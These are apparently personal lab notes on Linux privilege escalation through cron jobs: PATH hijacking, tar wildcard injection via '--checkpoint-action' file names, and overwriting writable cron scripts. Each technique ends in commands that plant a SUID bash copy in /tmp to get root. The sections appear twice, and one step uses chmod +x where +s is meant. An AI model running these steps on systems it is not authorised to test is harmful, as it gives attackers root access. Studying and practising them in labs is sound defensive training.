Scheduled tasks

Cron Path

Enumeration

We have to check in the crontab for example with cat /etc/crontab if we can not read this file we still could check other ways to enumerate scheduled task using payload all the things documentation or an enumeration tool like linpeas
In our example the system will try to run a file that does not exist (if we ls in home/user we do not see it)
So we can try to create a file named overwrite.sh and make it escalate privileges

Exploitation

echo 'cp /bin/bash /tmp/bash; chmod +x /tmp/bash' > /home/user/overwrite.sh we create our overwrite file. Our script will create a bash with suid priv
chmod +x /home/user/overwrite.sh we need to make it executable
/tmp/bash -p we execute it and we get root

Cron Wildcards

Enumeration

cat /etc/crontab in our example we have a /usr/local/bin/compress.sh
We can have a look at the script cat /usr/local/bin/compress.sh
The script goes to the user home and makes a backup of the content using a wildcard * and stores it in tmp
We can not modify the script so we need to do something that uses the script to get our privesc. In order to do so we can do command related to tar as the script uses it.

Exploitation

echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/runme.sh we create a malicious bash
touch /home/user/--checkpoint=1 when the scheduled script is going to read the home directory it will have a file named as a tar command, so it will interpret it. This command displays a status message every 1
touch /home/user/--checkpoint-action=exec=sh\ runme.sh then this command is going to make and action when the checkpoint we created before is hit
After a minute we can then launch our bash /tmp/bash -p

Cron files overwrite

Enumeration

We locate where is the file using locate overwrite.sh
We can overwrite it

Exploitation

echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /usr/local/bin/overwrite.sh We are overwriting the file with a command that will copy bash and give it suid perms
After a minute we should be able to launch /tmp/bash -p

PreviousCapabilities NextNFS Root Squashing

Last updated 2 years ago

Cron Path

Enumeration

We have to check in the crontab for example with cat /etc/crontab if we can not read this file we still could check other ways to enumerate scheduled task using payload all the things documentation or an enumeration tool like linpeas

In our example the system will try to run a file that does not exist (if we ls in home/user we do not see it)

So we can try to create a file named overwrite.sh and make it escalate privileges

Exploitation

echo 'cp /bin/bash /tmp/bash; chmod +x /tmp/bash' > /home/user/overwrite.sh we create our overwrite file. Our script will create a bash with suid priv

chmod +x /home/user/overwrite.sh we need to make it executable

/tmp/bash -p we execute it and we get root

Cron Wildcards

Enumeration

cat /etc/crontab in our example we have a /usr/local/bin/compress.sh

We can have a look at the script cat /usr/local/bin/compress.sh

The script goes to the user home and makes a backup of the content using a wildcard * and stores it in tmp

We can not modify the script so we need to do something that uses the script to get our privesc. In order to do so we can do command related to tar as the script uses it.

Exploitation

echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/runme.sh we create a malicious bash

touch /home/user/--checkpoint=1 when the scheduled script is going to read the home directory it will have a file named as a tar command, so it will interpret it. This command displays a status message every 1

touch /home/user/--checkpoint-action=exec=sh\ runme.sh then this command is going to make and action when the checkpoint we created before is hit

After a minute we can then launch our bash /tmp/bash -p

We should be root!

Cron files overwrite

Enumeration

cat /etc/crontab in our example we will use the file overwrite.sh

We locate where is the file using locate overwrite.sh

Check the permission on the file we want to overwrite ls -l /usr/local/bin/overwrite.sh

We can overwrite it

Exploitation

echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /usr/local/bin/overwrite.sh We are overwriting the file with a command that will copy bash and give it suid perms

After a minute we should be able to launch /tmp/bash -p

We should be root!